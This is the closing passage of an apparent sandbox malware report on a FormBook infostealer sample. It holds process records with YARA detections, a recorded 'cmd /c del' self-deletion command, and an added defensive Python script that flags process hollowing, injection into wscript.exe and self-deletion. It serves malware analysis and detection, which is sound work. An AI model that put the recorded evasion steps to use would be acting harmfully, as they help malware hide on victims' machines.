                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff6fee60000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:18:05:20
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Imagebase:0xdf0000
                                                                                                          File size:147456 bytes
                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:18:05:24
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del 'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:18:05:24
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
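
The six process records above are enough to reproduce the three findings a responder would pull out of this report by hand: a second copy of the sample whose own image base has become an RWX region carrying the FormBook payload (the hollowing the signatures flag), a script host launched with no script (the injection target), and a cmd.exe that deletes the original sample. The script below is an added example, not part of the Joe Sandbox report; the records are transcribed from the tables above, while the field layout assumed for the .sdmp file names (fourth field = region base, fifth = Win32 page protection) and the list of script hosts are assumptions, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Win32 page-protection constants (winnt.h), used to read the .sdmp names.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

SAMPLE_PATH = r"C:\Users\user\Desktop\New Order.exe"

# Illustrative list of script hosts injectors start just to own the process
# (assumption for this example, not a field of the report).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Proc:
    start: str          # "Start time" column
    path: str           # "Path" column
    cmdline: str        # "Commandline" column
    imagebase: int      # "Imagebase" column
    wow64: bool         # "Wow64 process (32bit)" column
    yara_dumps: List[str] = field(default_factory=list)  # "Source:" of each Yara match


# Transcribed from the "System Behavior" tables of the report.
PROCS = [
    Proc("18:04:57", SAMPLE_PATH, f"'{SAMPLE_PATH}'", 0x400000, True, [
        "00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp"]),
    Proc("18:04:58", SAMPLE_PATH, f"'{SAMPLE_PATH}'", 0x400000, True, [
        "00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp",
        "00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp",
        "00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp",
        "00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp"]),
    Proc("18:05:03", r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE",
         0x7ff6fee60000, False),
    Proc("18:05:20", r"C:\Windows\SysWOW64\wscript.exe",
         r"C:\Windows\SysWOW64\wscript.exe", 0xdf0000, True, [
        "00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp",
        "00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp"]),
    Proc("18:05:24", r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE_PATH}'",
         0x11d0000, True),
    Proc("18:05:24", r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", 0x7ff724c50000, False),
]


def parse_dump_name(name: str) -> Dict[str, int]:
    """Split a dotted .sdmp name into the two fields used here.
    Assumption (not documented on this page): field 4 is the region base
    address and field 5 is the region's page protection, both hex."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    return {"base": int(parts[3], 16), "protect": int(parts[4], 16)}


def rwx_regions(proc: Proc) -> List[int]:
    """Base addresses of Yara-matched regions that were executable and writable."""
    bases = {parse_dump_name(d)["base"] for d in proc.yara_dumps
             if parse_dump_name(d)["protect"] & PAGE_EXECUTE_READWRITE}
    return sorted(bases)


def find_hollowed(procs: List[Proc]) -> List[Proc]:
    """Second instance of an already-seen image whose own image base is an
    RWX region carrying the payload: the shape of process hollowing."""
    seen, hits = set(), []
    for p in procs:
        if p.path.lower() in seen and p.imagebase in rwx_regions(p):
            hits.append(p)
        seen.add(p.path.lower())
    return hits


def find_bare_host_launch(procs: List[Proc]) -> List[Proc]:
    """Script host started with no script to run: a process wanted only as
    an injection target."""
    hits = []
    for p in procs:
        name = p.path.rsplit("\\", 1)[-1].lower()
        bare = p.cmdline.strip().strip("'\"").lower() == p.path.lower()
        if name in SCRIPT_HOSTS and bare:
            hits.append(p)
    return hits


def find_self_delete(procs: List[Proc], sample: str) -> List[Proc]:
    """cmd.exe deleting the original sample once the payload lives elsewhere."""
    pat = re.compile(r"\bdel\b", re.IGNORECASE)
    return [p for p in procs
            if p.path.lower().endswith("\\cmd.exe")
            and pat.search(p.cmdline) and sample.lower() in p.cmdline.lower()]


def triage(procs: List[Proc], sample: str) -> Dict[str, List[str]]:
    """One summary line per finding, keyed by check name."""
    return {
        "hollowed": [f"{p.start} {p.path} rwx@{p.imagebase:#x}" for p in find_hollowed(procs)],
        "bare_host": [f"{p.start} {p.path}" for p in find_bare_host_launch(procs)],
        "self_delete": [f"{p.start} {p.cmdline}" for p in find_self_delete(procs, sample)],
    }


if __name__ == "__main__":
    for check, lines in triage(PROCS, SAMPLE_PATH).items():
        print(check)
        for line in lines:
            print("  ", line)
```

The checks use only columns the report exposes (path, command line, image base, and the Yara match sources), so the same records can be fed in from another sandbox's process table. Note that the first sample instance only has a PAGE_READWRITE match at 0x22A0000 (the unpacked payload before it is written into the child), which is why it is not reported as hollowed, and that the 64-bit explorer.exe record carries no Yara match at all; the 32-bit wscript.exe is where the payload ends up.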

                                                                                                          Disassembly

                                                                                                          Code Analysis
